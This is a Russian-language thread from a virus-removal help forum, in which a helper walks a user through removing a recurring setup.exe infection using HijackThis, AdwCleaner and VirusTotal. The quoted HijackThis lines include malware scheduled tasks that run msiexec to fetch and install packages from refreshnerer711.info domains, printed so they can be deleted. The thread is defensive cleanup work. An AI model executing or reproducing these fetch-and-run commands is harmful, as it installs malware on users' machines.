Перейти к содержанию
Правила раздела

Постоянно создается файл setup в InstallShield

Logame

Автор Logame
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

Logame

Logame

Опубликовано
Опубликовано

Доброй ночи,возникла проблема с вирусом setup.exe который блочит антивирусы и не даёт себя удалить,после удаления постоянно восстанавливается. Расположен в C:\Windows\SysWOW64\InstallShield\x32 изза него постоянно зависает Браузер. Помогите с проблемой!

Ссылка на комментарий
Поделиться на другие сайты
regist

regist

Опубликовано
Опубликовано

"Пофиксите" в HijackThis:

O1 - Hosts: is damaged (contains NUL characters only)
O4 - MSConfig\startupfolder: C:^Users^Logame^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Shortcut to Primary output from Start (Active).lnk [backup] => (lnk is corrupted) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: DAEMON Tools Pro Agent [command] = C:\Program Files\DAEMON Tools Pro\DTAgent.exe -autorun (HKCU) (2018/04/24) (file missing)
O4 - MSConfig\startupreg: Discord [command] = C:\Users\Logame\AppData\Local\Discord\app-0.0.300\Discord.exe (HKCU) (2018/04/14) (file missing)
O4 - MSConfig\startupreg: DriverPack Cloud [command] = C:\Program Files (x86)\DriverPack Cloud\DriverPackCloud.exe --run startup (HKLM) (2018/04/12) (file missing)
O4 - MSConfig\startupreg: Gaijin.Net Agent [command] = C:\Users\Logame\AppData\Local\Gaijin\Program Files (x86)\NetAgent\gjagent.exe (HKCU) (2019/01/09) (file missing)
O4 - MSConfig\startupreg: MegaFon_MegaFonInternet [command] = C:\Program Files (x86)\MegaFon\MegaFon Internet\MegaFonInternet.exe /minimized (HKLM) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: Roox_YotaAccess_Modems [command] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (HKLM) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: Scartel_YotaAccess_Modems [command] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (HKLM) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: YoutubeDownloader [command] = C:\Users\Logame\AppData\Roaming\YoutubeDownloader\python\pythonw.exe "start.pyc" ml3 (HKCU) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: YoutubeDownloader_upd [command] = C:\Users\Logame\AppData\Roaming\YoutubeDownloader_upd\python\pythonw.exe "start.pyc" ml3 (HKCU) (2019/01/21)
O4-32 - HKLM\..\Run: [Roox_YotaAccess_Modems] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (file missing)
O22 - Task: BlueStacksHelper - C:\Logame\Programm\Новая папка\BlueStacks\Client\Helper\BlueStacksHelper.exe (file missing)
O22 - Task: \Microsoft\Windows\Services\WindowsUpdate32 - C:\Windows\srv_ext.exe --run (file missing)
O22 - Task: \Microsoft\Windows\WindowsBackup\WindowsBackupTask - C:\Windows\winmain64.exe --run --sh (file missing)
O22 - Task: {5008EF5A-9901-78AF-86FF-C6A75151CCC4} - C:\Windows\system32\msiexec.exe /package https://refreshnerer711.info/5b8Y14adu7Z.s1L -q
O22 - Task: {B46739DC-95A0-0F69-3A7F-DE9C89BB2D6E} - C:\Windows\SysWOW64\loAN.exe /q -package https://refreshnerer711rb.info/vIQBca2OuvKV.0S4

 

 

сделайте свежие логи из обычного режима.


+

  • Скачайте AdwCleaner и сохраните его на Рабочем столе.
  • Запустите его через правую кн. мыши от имени администратора, нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[s00].txt.
  • Прикрепите отчет к своему следующему сообщению.



 

Ссылка на комментарий
Поделиться на другие сайты
Logame

Logame

Опубликовано
  • Автор
Опубликовано

"Пофиксите" в HijackThis:

O1 - Hosts: is damaged (contains NUL characters only)
O4 - MSConfig\startupfolder: C:^Users^Logame^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Shortcut to Primary output from Start (Active).lnk [backup] => (lnk is corrupted) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: DAEMON Tools Pro Agent [command] = C:\Program Files\DAEMON Tools Pro\DTAgent.exe -autorun (HKCU) (2018/04/24) (file missing)
O4 - MSConfig\startupreg: Discord [command] = C:\Users\Logame\AppData\Local\Discord\app-0.0.300\Discord.exe (HKCU) (2018/04/14) (file missing)
O4 - MSConfig\startupreg: DriverPack Cloud [command] = C:\Program Files (x86)\DriverPack Cloud\DriverPackCloud.exe --run startup (HKLM) (2018/04/12) (file missing)
O4 - MSConfig\startupreg: Gaijin.Net Agent [command] = C:\Users\Logame\AppData\Local\Gaijin\Program Files (x86)\NetAgent\gjagent.exe (HKCU) (2019/01/09) (file missing)
O4 - MSConfig\startupreg: MegaFon_MegaFonInternet [command] = C:\Program Files (x86)\MegaFon\MegaFon Internet\MegaFonInternet.exe /minimized (HKLM) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: Roox_YotaAccess_Modems [command] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (HKLM) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: Scartel_YotaAccess_Modems [command] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (HKLM) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: YoutubeDownloader [command] = C:\Users\Logame\AppData\Roaming\YoutubeDownloader\python\pythonw.exe "start.pyc" ml3 (HKCU) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: YoutubeDownloader_upd [command] = C:\Users\Logame\AppData\Roaming\YoutubeDownloader_upd\python\pythonw.exe "start.pyc" ml3 (HKCU) (2019/01/21)
O4-32 - HKLM\..\Run: [Roox_YotaAccess_Modems] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (file missing)
O22 - Task: BlueStacksHelper - C:\Logame\Programm\Новая папка\BlueStacks\Client\Helper\BlueStacksHelper.exe (file missing)
O22 - Task: \Microsoft\Windows\Services\WindowsUpdate32 - C:\Windows\srv_ext.exe --run (file missing)
O22 - Task: \Microsoft\Windows\WindowsBackup\WindowsBackupTask - C:\Windows\winmain64.exe --run --sh (file missing)
O22 - Task: {5008EF5A-9901-78AF-86FF-C6A75151CCC4} - C:\Windows\system32\msiexec.exe /package https://refreshnerer711.info/5b8Y14adu7Z.s1L -q
O22 - Task: {B46739DC-95A0-0F69-3A7F-DE9C89BB2D6E} - C:\Windows\SysWOW64\loAN.exe /q -package https://refreshnerer711rb.info/vIQBca2OuvKV.0S4

сделайте свежие логи из обычного режима.

+

 

  • Скачайте AdwCleaner и сохраните его на Рабочем столе.
  • Запустите его через правую кн. мыши от имени администратора, нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[s00].txt.
  • Прикрепите отчет к своему следующему сообщению.

 

 

 

CollectionLog-2019.02.03-20.45.zip

AdwCleanerS02.txt

Ссылка на комментарий
Поделиться на другие сайты
regist

regist

Опубликовано
Опубликовано (изменено)

1) Не надо заниматься оверковтингом.

2) деинсталируйте

HitmanPro 3.8 [20180513]-->"C:\Program Files\HitmanPro\HitmanPro.exe" /uninstall
3) Удалите остатки avast.

4) "Пофиксите" в HijackThis:

O4 - MSConfig\startupfolder: C:^Users^Logame^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Shortcut to Primary output from Start (Active).lnk [backup] => (lnk is corrupted) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: DAEMON Tools Pro Agent [command] = C:\Program Files\DAEMON Tools Pro\DTAgent.exe -autorun (HKCU) (2018/04/24) (file missing)
O4 - MSConfig\startupreg: MegaFon_MegaFonInternet [command] = C:\Program Files (x86)\MegaFon\MegaFon Internet\MegaFonInternet.exe /minimized (HKLM) (2019/01/21) (file missing)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
5) Проверьте этот файл на virustotal

C:\Windows\srv_ext.exe
кнопка Выбрать файл (Choose File) - ищете нужный файл у вас в системе - Открыть (Browse) - Проверить (Scan it!). Нажать на кнопку Повторить анализ (Reanalyse) если будет. Дождитесь результата . Ссылку на результат (то, что будет в адресной строке в браузере) копируете и выкладываете в теме.

 

6)

  • Запустите повторно AdwCleaner (by Malwarebytes) (программу необходимо запускать через правую кн. мыши от имени администратора).
  • В меню Настройки включите дополнительно в разделе Базовые действия:
    • Сбросить политики IE
    • Сбросить политики Chrome
  • В меню Панель управления нажмите Сканировать.
  • По окончании нажмите кнопку Очистить и восстановить и дождитесь окончания удаления.
  • Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt (где x - любая цифра).
  • Прикрепите отчет к своему следующему сообщению
Внимание: Для успешного удаления нужна перезагрузка компьютера!!!.

 

Подробнее читайте в этом руководстве.

Изменено пользователем Sandor
Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • KitKat
      [РЕШЕНО] Постоянно возвращается MEM:Trojan.Win32.SEPEH.gen
      Автор KitKat
      CollectionLog-2025.06.29-18.57.zip
      Снова и снова возвращается вирус MEM:Trojan.Win32.SEPEH.gen . При работе с одной программой антивирус Касперский начинает сигнализировать об активности вируса. Удаляет. Некоторое время тихо, Потом опять возвращается. С середины мая воюю. Утилита доктора Вэба вообще ничего не находит. 
    • Quattro
      [РЕШЕНО] При каждой загрузке системы постоянно загружается фейковый AdBlock
      Автор Quattro
      Поймал откуда то фейковый Adblock, он установился во все браузеры. Самостоятельно удалил все расширения, вроде кое как почистил реестр, удалил из планировщика заданий, проверил несколькими программами и бестолку. Все равно при каждом запуске системы создаются вот такие файлы как на скрине. Каждый раз разное название, лежат одинаково в одном и том же месте для каждого браузера. Пользователи - Юзернейм - Appdata - Local - yandex - Default - extensions. Помогите удалить, уже всю голову изломал себе

      CollectionLog-2025.07.24-20.21.zip
    • Andrei93
      the application needs to be restored. run the setup wizard to restore
      Автор Andrei93
      Здравствуйте. У одного пользователя ошибка(Скрин)
       
      KES 12.3.0.493
       
      - Переустановка не помогает.
       
      Что можно придумать или какие логи могут помочь ?

    • Evgeniy Alekseevich
      Файлы зашифрованы, расширение файлов helpo2, как расшифровать ?
      Автор Evgeniy Alekseevich
      05 августа , судя по датам файлов, на нашем сервере был запущен шифровальщик, кем и как пока выясняем, но сегодня утром я обнаружил зашифрованы практически все файлы.
      Файлы имеют расширение helpo2.
      Может кто сталкивался и сможет помочь ?
      Связались с вымогателями, они для примера расшифровали два файла, я вложил в архив два зашифрованных и они же расшифрованные . Там же письмо, которое они оставили.
      Также прикладываю файлы от  Farbar Recovery Scan Tool.
      Может кто сможет помочь....
      С Уважением, Евгений.
       
       
      Addition.txt FRST.txt НаборФайлов5шт.zip
    • Денис А
      Все файлы зашифрованы шифровальщиком
      Автор Денис А
      Добрый день.
      Помогите, пожалуйста, расшифровать файлы на ПК.
      Приложил файлы зашифрованные. лог FRST и текстовый файл с требованием выкупа.
       
      Заранее спасибо.
      AeyLALoFF.README.txt зашифрованные файлы.rar Addition.txt
      FRST.txt
×
×
  • Создать...